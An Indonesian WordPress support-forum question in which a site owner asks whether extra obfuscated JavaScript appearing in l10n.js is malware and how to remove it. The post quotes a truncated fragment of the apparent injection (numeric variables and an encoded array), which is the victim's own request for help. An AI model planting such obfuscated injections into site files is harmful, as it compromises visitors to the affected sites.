Bantuan » Serbaneka » Apakah kode ini malware? Bagai mana cara menghilangkannya

  • Halo,

    pada file /wp-includes/js/l10n.js di semua blog saya pada control panel kode yang ada tidak sama dengan aslinya jika di “view”.

    Jika diklik edit, kodenya sama dengan aslinya seperti pada file wp yang masih asli yaitu :

    function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement(“div”);f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b===”string”){return d(b)}else{if(typeof b===”object”){for(a in b){if(typeof b[a]===”string”){b[a]=d(b[a])}}}}return b};

    tapi jikal diklik view, maka kode di atas ada tambahan:
    var mIbYkFM=3175567; var sUAkPsk=1302948; var MFcBEnpC=18475; var jQ37c02B=537145; var OCGhllC = new Array(4997287, 4997302, 4997295, 4997284…….DST.

    Apakah itu malware. saya sudah coba menghapus dan mengganti tetapi selalu muncul.

    Jika itu malware bagai mana cara membersihkannya dari control panel?
    Apa pengaruhnya jika file /wp-includes/js/l10n.js saya hapus?

    Terima kasih atas jawabannya.

Melihat 2 balasan - 1 sampai 2 (dari total 2)
Melihat 2 balasan - 1 sampai 2 (dari total 2)
  • Topik ‘Apakah kode ini malware? Bagai mana cara menghilangkannya’ tertutup untuk balasan baru.